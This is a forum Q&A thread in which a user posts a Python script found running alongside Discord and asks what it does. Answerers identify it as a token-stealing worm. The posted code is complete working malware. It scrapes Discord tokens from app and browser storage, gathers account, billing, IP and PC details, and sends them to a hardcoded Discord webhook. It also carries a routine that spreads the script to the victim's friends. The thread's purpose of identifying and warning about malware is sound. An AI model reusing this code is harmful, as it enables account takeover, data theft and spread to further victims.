Discord malware
Asked Answered
S

2

14

Someone contacted me with a problem regarding Discord. The code below was brought to my attention as it was run around the time the problems began. Windows asks what program the code below should be run with and the default is Discord. Every time Discord is run, this chunk of code is run:

import os
if os.name != "nt":
    exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv

LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")

PATHS = {

    "Discord"           : ROAMING + "\\Discord",

    "Discord Canary"    : ROAMING + "\\discordcanary",

    "Discord PTB"       : ROAMING + "\\discordptb",

    "Google Chrome"     : LOCAL + "\\Google\\Chrome\\User Data\\Default",

    "Opera"             : ROAMING + "\\Opera Software\\Opera Stable",

    "Brave"             : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",

    "Yandex"            : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"

}

def getheaders(token=None, content_type="application/json"):

    headers = {

        "Content-Type": content_type,

        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"

    }

    if token:

        headers.update({"Authorization": token})

    return headers

def getuserdata(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())

    except:

        pass

def gettokens(path):

    path += "\\Local Storage\\leveldb"

    tokens = []

    for file_name in os.listdir(path):

        if not file_name.endswith(".log") and not file_name.endswith(".ldb"):

            continue

        for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:

            for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):

                for token in findall(regex, line):

                    tokens.append(token)

    return tokens

def getdeveloper():

    dev = "wodx"

    try:

        dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()

    except:

        pass

    return dev

def getip():

    ip = "None"

    try:

        ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()

    except:

        pass

    return ip

def getavatar(uid, aid):

    url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"

    try:

        urlopen(Request(url))

    except:

        url = url[:-4]

    return url

def gethwid():

    p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)

    return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]

def getfriends(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())

    except:

        pass

def getchat(token, uid):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]

    except:

        pass

def has_payment_methods(token):

    try:

        return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)

    except:

        pass

def send_message(token, chat_id, form_data):

    try:

        urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()

    except:

        pass

def spread(token, form_data, delay):

    return # Remove to re-enabled

    for friend in getfriends(token):

        try:

            chat_id = getchat(token, friend["id"])

            send_message(token, chat_id, form_data)

        except Exception as e:

            pass

        sleep(delay)

def main():

    cache_path = ROAMING + "\\.cache~$"

    prevent_spam = True

    self_spread = True

    embeds = []

    working = []

    checked = []

    already_cached_tokens = []

    working_ids = []

    ip = getip()

    pc_username = os.getenv("UserName")

    pc_name = os.getenv("COMPUTERNAME")

    user_path_name = os.getenv("userprofile").split("\\")[2]

    developer = getdeveloper()

    for platform, path in PATHS.items():

        if not os.path.exists(path):

            continue

        for token in gettokens(path):

            if token in checked:

                continue

            checked.append(token)

            uid = None

            if not token.startswith("mfa."):

                try:

                    uid = b64decode(token.split(".")[0].encode()).decode()

                except:

                    pass

                if not uid or uid in working_ids:

                    continue

            user_data = getuserdata(token)

            if not user_data:

                continue

            working_ids.append(uid)

            working.append(token)

            username = user_data["username"] + "#" + str(user_data["discriminator"])

            user_id = user_data["id"]

            avatar_id = user_data["avatar"]

            avatar_url = getavatar(user_id, avatar_id)

            email = user_data.get("email")

            phone = user_data.get("phone")

            nitro = bool(user_data.get("premium_type"))

            billing = bool(has_payment_methods(token))

            embed = {

                "color": 0x0eec59,

                "fields": [

                    {

                        "name": "**Account Info**",

                        "value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',

                        "inline": True

                    },

                    {

                        "name": "**PC Info**",

                        "value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',

                        "inline": True

                    },

                    {

                        "name": "**Token**",

                        "value": token,

                        "inline": False

                    }

                ],

                "author": {

                    "name": f"{username} ({user_id})",

                    "icon_url": avatar_url

                },

                "footer": {

                    "text": f"Token grabber by THC4L"

                }

            }

            embeds.append(embed)

    with open(cache_path, "a") as file:

        for token in checked:

            if not token in already_cached_tokens:

                file.write(token + "\n")

    if len(working) == 0:

        working.append('123')

    webhook = {

        "content": "",

        "embeds": embeds,

        "username": "THC4L",

        "avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"

    }

    try:

        urlopen(Request("https://discord.com/api/webhooks/799694650549862420/rFrqEzYaTC7uS353j0HIWZaxGfxe_B6X1aTsPRY_hWOkWQIecm70fKLwMbfb8wyPz2VB", data=dumps(webhook).encode(), headers=getheaders()))

    except:

        pass

    if self_spread:

        for token in working:

            with open(argv[0], encoding="utf-8") as file:

                content = file.read()

            payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'

            Thread(target=spread, args=(token, payload, 7500 / 1000)).start()

try:

    main()

except Exception as e:

    print(e)

    pass

Any idea what this could be? I can see: for token in gettokens(path): and "text": f"Token grabber by THC4L" It almost looks like a Discord token skimmer. It looks like it takes phone numbers, usernames, account info, PC info and more...

EDIT:

THIS IS MALWARE. This is a token logger for the Discord desktop app. It also looks in your browser for other discord-related information.

It has been reviewed in greater depth here:

https://www.youtube.com/watch?v=s3wS1Dd3FFs&feature=youtu.be

The scriptwriter gives some very insightful information in the Pastebin link he provided and I would encourage you to check it out: https://pastebin.com/0q0Fk0Ej enter image description here

It specificaly tries to pull:

  • Public ip address
  • Discord tokens
  • Discord friends
  • Discord friend's ids
  • Dicord username
  • Discord user id
  • Discord email
  • Discord nitro (checks if you have it)
  • Phone number
  • Billing onfo
  • PC username
  • PC name
  • PC platform

Since removed YouTube account promoting the script:

https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

The creator's Github account:

https://github.com/ecriminal

Syllogize answered 14/2, 2021 at 3:34 Comment(4)
Not sure why it was posted as question. You already have answered your question.Aeroballistics
It was a question, but I updated it to include the answer. That way one can skim or scroll down and get the answer.Syllogize
Intention is nice, but that's unsystematic way. Correct way is, you should post an another answer instead of combining question + answer. That way, no one would confuse, like I was.Aeroballistics
Yep, sorry about that. I will make sure to keep that in mind for future posts :)Syllogize
C
11

That is malware, not only a token logger but also stealing Chrome, Brave, Opera and Yandex passwords. Uninstall that immediately and change all your passwords.

YouTube channel of creator: https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

update: As it turns out, it also steals your ip, yay!

Carthage answered 14/2, 2021 at 3:43 Comment(4)
Uhm, actually, it doesn't steal browser passwords, it just looks for your discord token in those broswers. And IP doesn't matter, I really don't know why people are worried about your IP being leaked.Matos
The real question is if IP didn't matter, then why are they stealing your IP?Ordinal
IP do matters and used to find geological location. Now its depend on user, whether they care or not.Aeroballistics
Although the script does not contain any autostart functions, it's better to verify your system for any existing ones. you should uninstall the app and inspect any related scripts.Erysipeloid
M
3

This is indeed malware, but not in the way that makerio says. It only tries to send your discord token, and it finds that in either Discord itself, or in the browser. You have to remove this virus, and change your Discord password. Looking through the code, it also seems like they have enabled the option to send the virus to the discord friends, so you should try to delete any messages with this virus in it, and clarify that it wasn't you.

Matos answered 13/4, 2021 at 10:6 Comment(0)

© 2022 - 2024 — McMap. All rights reserved.